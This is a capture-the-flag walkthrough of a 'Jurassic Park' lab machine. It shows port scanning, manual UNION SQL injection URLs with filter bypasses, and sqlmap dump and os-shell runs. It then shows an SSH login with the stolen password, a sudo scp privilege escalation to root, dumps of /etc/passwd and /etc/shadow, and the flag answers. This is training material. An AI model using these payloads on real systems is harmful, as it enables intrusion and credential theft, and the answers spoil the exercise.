Jurassic Park
Jurassic Park CTF
Start Machine
This medium-hard task will require you to enumerate the web application, get credentials to the server and find 5 flags hidden around the file system. Oh, Dennis Nedry has helped us to secure the app too...
You're also going to want to turn up your devices volume (firefox is recommended). So, deploy the VM and get hacking..
Please connect to our network before deploying the machine.
Answer the questions below
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ rustscan -a 10.10.87.126 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.87.126:22
Open 10.10.87.126:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-14 12:33 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:33
Completed NSE at 12:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:33
Completed NSE at 12:33, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:33
Completed NSE at 12:33, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 12:33
Completed Parallel DNS resolution of 1 host. at 12:33, 0.01s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 12:33
Scanning 10.10.87.126 [2 ports]
Discovered open port 80/tcp on 10.10.87.126
Discovered open port 22/tcp on 10.10.87.126
Completed Connect Scan at 12:33, 0.19s elapsed (2 total ports)
Initiating Service scan at 12:33
Scanning 2 services on 10.10.87.126
Completed Service scan at 12:33, 6.49s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.87.126.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:33
Completed NSE at 12:33, 9.96s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:33
Completed NSE at 12:33, 2.40s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:33
Completed NSE at 12:33, 0.00s elapsed
Nmap scan report for 10.10.87.126
Host is up, received user-set (0.19s latency).
Scanned at 2023-01-14 12:33:06 EST for 19s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f362ca366f9a5bdcc41ed269e4c33f0f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/ulPfmLciJKOQwTWqImu8bo1KQ4XU14AbMxwuXucoYnIFVes9C8OIxKdFvyoDQ1whE4xG1UInWS0PDiqJd/uwTk4minkaYwSCJpcw2Jf1cnJPwwpbZNEJjZb+f3VgTKpxoW6XMh59rk4ihG9uMkL8yqMGovDNJNmbm1OZYN2NqPjJ8vkL5cxvZLHNM2vuhqQ5CqduXwS5SQfvcCAIGpB47smeg8oRt8/2zpTA3IUQnqT8tzAanLYxWttUAQexqXgvJDjKhZ7SkdP58o6b+tAlubxAlR27CnWwNL5JbdV/fc15IIeTRr6Q98SNEpwrWgTMa/HsyT0uTlxJXrJSLjrj
| 256 080e6457eae87eba8bbb9325917c04c0 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLRESt3pjeeVThKuxVh/YM7F/jt1rnPgIOpbk/XL/SjKhuVFkLbPa1EqvsfxSAv+casNeBN/CxmPGGBBKyWxx+4=
| 256 b6d1daacc7de8035e5949ad4e37745ec (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGpWTsX5q9Q5JPmYbpqLapcTLLrTinz6hgpFvVdNchJb
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 019A6B943FC3AAA6D09FBA3C139A909A
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Jarassic Park
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:33
Completed NSE at 12:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:33
Completed NSE at 12:33, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:33
Completed NSE at 12:33, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.24 seconds
view-source:http://10.10.87.126/shop.php
<a href="/item.php?id=3" class="btn btn-danger">Buy Basic</a>
</div>
</div>
</div>
<div class="col-sm-4">
<div class="card" style="width: 18rem;">
<img class="card-img-top" src="assets/3.jpg" alt="Card image cap">
<div class="card-body">
<h5 class="card-title">Bronse</h5>
<p class="card-text">Tour around park and dinosaur lunch.</p>
<a href="/item.php?id=2" class="btn btn-danger">Buy Bronse</a>
</div>
</div>
</div>
<div class="col-sm-4">
<div class="card" style="width: 18rem;">
<img class="card-img-top" src="assets/2.jpg" alt="Card image cap">
<div class="card-body">
<h5 class="card-title">Gold</h5>
<p class="card-text">Tour, dinosaur lunch and free dinosaur egg.</p>
<a href="/item.php?id=1" class="btn btn-danger">Buy Gold</a>
http://10.10.87.126/item.php?id=5
Dennis, why have you blocked these characters: ' # DROP - username @ ---- Is this our WAF now?
http://10.10.87.126/item.php?id=5%20union%20select%201,2,3,4,5
2,4,5 (vulnerables)
http://10.10.87.126/item.php?id=5%20union%20select%201,database(),3,version(),5
or
http://10.10.87.126/item.php?id=5%20union%20select%201,(select+group_concat(schema_name,%22\r\n%22)+from+information_schema.schemata),3,version(),5
park Package , 5 of these packages have been sold in the last hour, 5.7.25-0ubuntu0.16.04.2
information_schema ,mysql ,park ,performance_schema ,sys Package, 5.7.25-0ubuntu0.16.04.2
now retrieve table_name and column_name
http://10.10.87.126/item.php?id=5%20union%20select%201,(select+group_concat(table_name,%22:%22,column_name)+from+information_schema.columns+where+table_schema=database()),3,4,5
items:id,items:package,items:price,items:information,items:sold,users:id,users:username,users:password Package
users:username and password
http://10.10.87.126/item.php?id=5%20union%20select%201,(select+group_concat(username,%22:%22,password)+from+database().users),3,4,5
won't work cz username is blocked
http://10.10.87.126/item.php?id=5%20union%20select%201,(select+group_concat(0x757365726e616d65,%22:%22,password)+from+park.users),3,4,5
username:D0nt3ATM3,username:ih8dinos Package
http://10.10.87.126/item.php?id=5%20union%20select%201,(select+group_concat(password)+from+park.users),3,4,5
D0nt3ATM3,ih8dinos
Dennis: ih8dinos
using sqlmap
https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap
https://hacknopedia.com/2022/07/29/sqlmap-tamper-script-collection/
https://red-orbita.com/?p=7476
https://alomancy.gitbook.io/guides/cheat-sheets/sql-injection/sqlmap
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ sqlmap -u 'http://10.10.87.126/item.php?id=5' --dump
___
__H__
___ ___[)]_____ ___ ___ {1.6.12#stable}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:13:14 /2023-01-14/
[14:13:14] [INFO] resuming back-end DBMS 'mysql'
[14:13:14] [INFO] testing connection to the target URL
[14:13:29] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=5 AND 2300=2300
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=5 AND GTID_SUBSET(CONCAT(0x716b627071,(SELECT (ELT(6652=6652,1))),0x716a786271),6652)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=5 AND (SELECT 4991 FROM (SELECT(SLEEP(5)))hzDI)
---
[14:13:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.6
[14:13:29] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[14:13:29] [INFO] fetching current database
[14:13:29] [INFO] resumed: 'park'
[14:13:29] [INFO] fetching tables for database: 'park'
[14:13:29] [INFO] resumed: 'items'
[14:13:29] [INFO] resumed: 'users'
[14:13:29] [INFO] fetching columns for table 'users' in database 'park'
[14:13:29] [INFO] resumed: 'id'
[14:13:29] [INFO] resumed: 'int(11) unsigned'
[14:13:29] [INFO] resumed: 'username'
[14:13:29] [INFO] resumed: 'varchar(11)'
[14:13:29] [INFO] resumed: 'password'
[14:13:29] [INFO] resumed: 'varchar(11)'
[14:13:29] [INFO] fetching entries for table 'users' in database 'park'
[14:13:29] [INFO] resumed: '1'
[14:13:29] [INFO] resumed: 'D0nt3ATM3'
[14:13:43] [WARNING] reflective value(s) found and filtering out
[14:13:43] [INFO] resumed: '2'
[14:13:43] [INFO] resumed: 'ih8dinos'
Database: park
Table: users
[2 entries]
+----+-----------+----------+
| id | password | username |
+----+-----------+----------+
| 1 | D0nt3ATM3 | |
| 2 | ih8dinos | |
+----+-----------+----------+
[14:13:57] [INFO] table 'park.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/10.10.87.126/dump/park/users.csv'
[14:13:57] [INFO] fetching columns for table 'items' in database 'park'
[14:13:57] [INFO] resumed: 'id'
[14:13:57] [INFO] resumed: 'int(11) unsigned'
[14:13:57] [INFO] resumed: 'package'
[14:13:57] [INFO] resumed: 'varchar(11)'
[14:13:57] [INFO] resumed: 'price'
[14:13:57] [INFO] resumed: 'int(11)'
[14:13:57] [INFO] resumed: 'information'
[14:13:57] [INFO] resumed: 'char(250)'
[14:13:57] [INFO] resumed: 'sold'
[14:13:57] [INFO] resumed: 'int(11)'
[14:13:57] [INFO] fetching entries for table 'items' in database 'park'
[14:13:57] [INFO] resumed: '1'
[14:13:57] [INFO] resumed: 'Childen under 5 can attend free of charge and will be eaten for free. This package includes a dinosaur lunc...
[14:13:57] [INFO] resumed: 'Gold'
[14:13:57] [INFO] resumed: '500000'
[14:13:57] [INFO] resumed: '4'
[14:13:57] [INFO] resumed: '2'
[14:13:57] [INFO] resumed: 'Children under 5 can attend free of charge and eat free. This package includes a tour around the park and a...
[14:13:57] [INFO] resumed: 'Bronse'
[14:13:57] [INFO] resumed: '250000'
[14:13:57] [INFO] resumed: '11'
[14:13:57] [INFO] resumed: '3'
[14:13:57] [INFO] resumed: 'Children under 5 can attend for free and eat free. This package will include a basic tour around the park i...
[14:13:57] [INFO] resumed: 'Basic'
[14:13:57] [INFO] resumed: '100000'
[14:13:57] [INFO] resumed: '27'
[14:13:57] [INFO] resumed: '5'
[14:13:57] [INFO] resumed: 'Dennis, why have you blocked these characters: ' # DROP - username @ ---- Is this our WAF now?'
[14:13:57] [INFO] resumed: 'Development'
[14:13:57] [INFO] resumed: '0'
[14:13:57] [INFO] resumed: '0'
[14:13:57] [INFO] resumed: '100'
[14:13:57] [INFO] resumed: 'Nope'
[14:13:57] [INFO] resumed: '...'
[14:13:57] [INFO] resumed: '-1'
[14:13:57] [INFO] resumed: '-1'
Database: park
Table: items
[5 entries]
+-----+------+--------+-------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | sold | price | package | information |
+-----+------+--------+-------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1 | 4 | 500000 | Gold | Childen under 5 can attend free of charge and will be eaten for free. This package includes a dinosaur lunch, tour around the park AND a FREE dinosaur egg from a dino of your choice! |
| 2 | 11 | 250000 | Bronse | Children under 5 can attend free of charge and eat free. This package includes a tour around the park and a dinosaur lunch! Try different dino's and rate the best tasting one! |
| 3 | 27 | 100000 | Basic | Children under 5 can attend for free and eat free. This package will include a basic tour around the park in the brand new automated cars! |
| 5 | 0 | 0 | Development | Dennis, why have you blocked these characters: ' # DROP - username @ ---- Is this our WAF now? |
| 100 | -1 | -1 | ... | Nope |
+-----+------+--------+-------------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
[14:13:57] [INFO] table 'park.items' dumped to CSV file '/home/kali/.local/share/sqlmap/output/10.10.87.126/dump/park/items.csv'
[14:13:57] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.10.87.126'
[*] ending @ 14:13:57 /2023-01-14/
maybe using --random-agent and --tamper=between will work too
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ sqlmap -u 'http://10.10.87.126/item.php?id=5' --os-shell
___
__H__
___ ___[.]_____ ___ ___ {1.6.12#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:19:13 /2023-01-14/
[14:19:13] [INFO] resuming back-end DBMS 'mysql'
[14:19:13] [INFO] testing connection to the target URL
[14:19:27] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=5 AND 2300=2300
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=5 AND GTID_SUBSET(CONCAT(0x716b627071,(SELECT (ELT(6652=6652,1))),0x716a786271),6652)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=5 AND (SELECT 4991 FROM (SELECT(SLEEP(5)))hzDI)
---
[14:19:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.6
[14:19:27] [INFO] going to use a web backdoor for command prompt
[14:19:27] [INFO] fingerprinting the back-end DBMS operating system
[14:19:41] [WARNING] reflective value(s) found and filtering out
[14:19:41] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[14:19:41] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
Y
[14:20:58] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> Y
[14:20:58] [INFO] retrieved web server absolute paths: '/item~.php'
[14:20:58] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[14:21:13] [WARNING] unable to upload the file stager on '/var/www/'
[14:21:13] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[14:21:27] [WARNING] unable to upload the file stager on '/var/www/html/'
[14:21:27] [INFO] trying to upload the file stager on '/var/www/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[14:21:42] [WARNING] unable to upload the file stager on '/var/www/htdocs/'
[14:21:42] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[14:21:57] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/'
[14:21:57] [INFO] trying to upload the file stager on '/usr/local/www/data/' via LIMIT 'LINES TERMINATED BY' method
[14:22:13] [WARNING] unable to upload the file stager on '/usr/local/www/data/'
[14:22:13] [INFO] trying to upload the file stager on '/var/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[14:22:29] [WARNING] unable to upload the file stager on '/var/apache2/htdocs/'
[14:22:29] [INFO] trying to upload the file stager on '/var/www/nginx-default/' via LIMIT 'LINES TERMINATED BY' method
[14:22:42] [WARNING] unable to upload the file stager on '/var/www/nginx-default/'
[14:22:42] [INFO] trying to upload the file stager on '/srv/www/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[14:22:57] [WARNING] unable to upload the file stager on '/srv/www/htdocs/'
[14:22:57] [INFO] trying to upload the file stager on '/usr/local/var/www/' via LIMIT 'LINES TERMINATED BY' method
[14:23:13] [WARNING] unable to upload the file stager on '/usr/local/var/www/'
[14:23:13] [INFO] trying to upload the file stager on '/' via LIMIT 'LINES TERMINATED BY' method
https://www.netsecfocus.com/oscp/2021/05/06/The_Journey_to_Try_Harder-_TJnull-s_Preparation_Guide_for_PEN-200_PWK_OSCP_2.0.html#overview
using ssh
┌──(kali㉿kali)-[~/nappy/DX1]
└─$ ssh dennis@10.10.85.176
The authenticity of host '10.10.85.176 (10.10.85.176)' can't be established.
ED25519 key fingerprint is SHA256:mYJfS6ZzIpij07jaVOhMJAiaP90i+wUWV67p1+lbGj4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.85.176' (ED25519) to the list of known hosts.
dennis@10.10.85.176's password: ih8dinos
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-1072-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Get cloud support with Ubuntu Advantage Cloud Guest:
http://www.ubuntu.com/business/services/cloud
62 packages can be updated.
45 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
dennis@ip-10-10-85-176:~$ id
uid=1001(dennis) gid=1001(dennis) groups=1001(dennis)
dennis@ip-10-10-85-176:~$ cat flag1.txt
Congrats on finding the first flag.. But what about the rest? :O
b89f2d69c56b9981ac92dd267f
dennis@ip-10-10-85-176:~$ grep -iR flag
test.sh:cat /root/flag5.txt
.bash_history:Flag3:b4973bbc9053807856ec815db25fb3f1
.bash_history:sudo scp /root/flag5.txt ben@10.8.0.6:/
.bash_history:sudo scp /root/flag5.txt ben@10.8.0.6:~/
.bash_history:sudo scp /root/flag5.txt ben@10.8.0.6:~/ -v
.bash_history:sudo scp -v /root/flag5.txt ben@10.8.0.6:~/
.bash_history:sudo scp -v /root/flag5.txt ben@localhost:~/
.bash_history:sudo scp -v /root/flag5.txt dennis@localhost:~/
.bash_history:sudo scp -v /root/flag5.txt dennis@10.0.0.59:~/
.bash_history:sudo scp -v /root/flag5.txt ben@10.8.0.6:~/
.bash_history:sudo scp /root/flag5.txt ben@10.8.0.6:~/
.bash_history:sudo scp /root/flag5.txt ben@88.104.10.206:~/
.bash_history:sudo scp -v /root/flag5.txt ben@88.104.10.206:~/
.bash_history:sudo scp /root/flag5.txt ben@10.8.0.6:~/
flag1.txt:Congrats on finding the first flag.. But what about the rest? :O
.viminfo: vim flagFour.txt
.viminfo: vim flag1.txt
.viminfo:'3 1802 31 /tmp/flagFour.txt
.viminfo:'4 1 63 ~/flag1.txt
.viminfo:'5 1 31 /boot/grub/fonts/flagTwo.txt
.viminfo:-' 1802 31 /tmp/flagFour.txt
.viminfo:-' 1 0 /tmp/flagFour.txt
.viminfo:-' 1 63 ~/flag1.txt
.viminfo:-' 1 31 /boot/grub/fonts/flagTwo.txt
.viminfo:-' 1 31 /boot/grub/fonts/flagTwo.txt
.viminfo:-' 1 31 /boot/grub/fonts/flagTwo.txt
.viminfo:-' 1 31 /boot/grub/fonts/flagTwo.txt
.viminfo:-' 1 63 ~/flag1.txt
.viminfo:-' 1 31 /boot/grub/fonts/flagTwo.txt
.viminfo:-' 1 31 /boot/grub/fonts/flagTwo.txt
.viminfo:-' 1 31 /boot/grub/fonts/flagTwo.txt
.viminfo:-' 1 31 /boot/grub/fonts/flagTwo.txt
.viminfo:-' 1802 31 /tmp/flagFour.txt
.viminfo:-' 1 0 /tmp/flagFour.txt
.viminfo:-' 1 63 ~/flag1.txt
.viminfo:-' 1 31 /boot/grub/fonts/flagTwo.txt
.viminfo:-' 1 31 /boot/grub/fonts/flagTwo.txt
.viminfo:-' 1 31 /boot/grub/fonts/flagTwo.txt
.viminfo:-' 1 31 /boot/grub/fonts/flagTwo.txt
.viminfo:-' 1 63 ~/flag1.txt
.viminfo:-' 1 31 /boot/grub/fonts/flagTwo.txt
.viminfo:-' 1 31 /boot/grub/fonts/flagTwo.txt
.viminfo:-' 1 31 /boot/grub/fonts/flagTwo.txt
.viminfo:-' 1 31 /boot/grub/fonts/flagTwo.txt
.viminfo:> /tmp/flagFour.txt
.viminfo:> ~/flag1.txt
.viminfo:> /boot/grub/fonts/flagTwo.txt
dennis@ip-10-10-85-176:~$ cat /boot/grub/fonts/flagTwo.txt
96ccd6b429be8c9a4b501c7a0b117b0a
dennis@ip-10-10-85-176:~$ cat .bash_history
Flag3:b4973bbc9053807856ec815db25fb3f1
dennis@ip-10-10-85-176:~$ cat test.sh
#!/bin/bash
cat /root/flag5.txt
dennis@ip-10-10-85-176:~$ ls -lah
total 44K
drwxr-xr-x 3 dennis dennis 4.0K Jan 14 22:37 .
drwxr-xr-x 4 root root 4.0K Feb 16 2019 ..
-rw------- 1 dennis dennis 1001 Feb 16 2019 .bash_history
-rw-r--r-- 1 dennis dennis 220 Feb 16 2019 .bash_logout
-rw-r--r-- 1 dennis dennis 3.7K Feb 16 2019 .bashrc
drwx------ 2 dennis dennis 4.0K Jan 14 22:37 .cache
-rw-rw-r-- 1 dennis dennis 93 Feb 16 2019 flag1.txt
-rw-r--r-- 1 dennis dennis 655 Feb 16 2019 .profile
-rw-rw-r-- 1 dennis dennis 32 Feb 16 2019 test.sh
-rw------- 1 dennis dennis 4.3K Feb 16 2019 .viminfo
priv esc
https://gtfobins.github.io/gtfobins/scp/
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:
dennis@ip-10-10-85-176:~$ sudo -l
Matching Defaults entries for dennis on ip-10-10-85-176.eu-west-1.compute.internal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dennis may run the following commands on ip-10-10-85-176.eu-west-1.compute.internal:
(ALL) NOPASSWD: /usr/bin/scp
dennis@ip-10-10-85-176:~$ TF=$(mktemp)
dennis@ip-10-10-85-176:~$ echo 'sh 0<&2 1>&2' > $TF
dennis@ip-10-10-85-176:~$ chmod +x "$TF"
dennis@ip-10-10-85-176:~$ sudo scp -S $TF x y:
# cat /root/flag5.txt
2a7074e491fcacc7eeba97808dc5e2ec
# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
mysql:x:112:117:MySQL Server,,,:/nonexistent:/bin/false
dennis:x:1001:1001:Dennis,,,:/home/dennis:/bin/bash
# cat /etc/shadow
root:*:17849:0:99999:7:::
daemon:*:17849:0:99999:7:::
bin:*:17849:0:99999:7:::
sys:*:17849:0:99999:7:::
sync:*:17849:0:99999:7:::
games:*:17849:0:99999:7:::
man:*:17849:0:99999:7:::
lp:*:17849:0:99999:7:::
mail:*:17849:0:99999:7:::
news:*:17849:0:99999:7:::
uucp:*:17849:0:99999:7:::
proxy:*:17849:0:99999:7:::
www-data:*:17849:0:99999:7:::
backup:*:17849:0:99999:7:::
list:*:17849:0:99999:7:::
irc:*:17849:0:99999:7:::
gnats:*:17849:0:99999:7:::
nobody:*:17849:0:99999:7:::
systemd-timesync:*:17849:0:99999:7:::
systemd-network:*:17849:0:99999:7:::
systemd-resolve:*:17849:0:99999:7:::
systemd-bus-proxy:*:17849:0:99999:7:::
syslog:*:17849:0:99999:7:::
_apt:*:17849:0:99999:7:::
lxd:*:17849:0:99999:7:::
messagebus:*:17849:0:99999:7:::
uuidd:*:17849:0:99999:7:::
dnsmasq:*:17849:0:99999:7:::
sshd:*:17849:0:99999:7:::
pollinate:*:17849:0:99999:7:::
ubuntu:!:17943:0:99999:7:::
mysql:!:17943:0:99999:7:::
dennis:$6$z2jJDHk8$2kdOlS5PLeeETO0DdUJ.tYHptXAQX2pCUNc6rmHCZNJkuHsY7Y5tcE5yxSSZK850Z4EjgPh6WXldhs4SWPYsB.:17943:0:99999:7:::
What is the SQL database called which is serving the shop information?
park
How many columns does the table have?
5
Whats the system version?
ubuntu 16.04
What is dennis' password?
ih8dinos
Locate and get the first flag contents.
b89f2d69c56b9981ac92dd267f
Whats the contents of the second flag?
96ccd6b429be8c9a4b501c7a0b117b0a
Whats the contents of the third flag?
b4973bbc9053807856ec815db25fb3f1
There is no fourth flag.
Completed
Whats the contents of the fifth flag?
Enumerate your privileges.
2a7074e491fcacc7eeba97808dc5e2ec
[[DX1 Liberty Island]]
Last updated
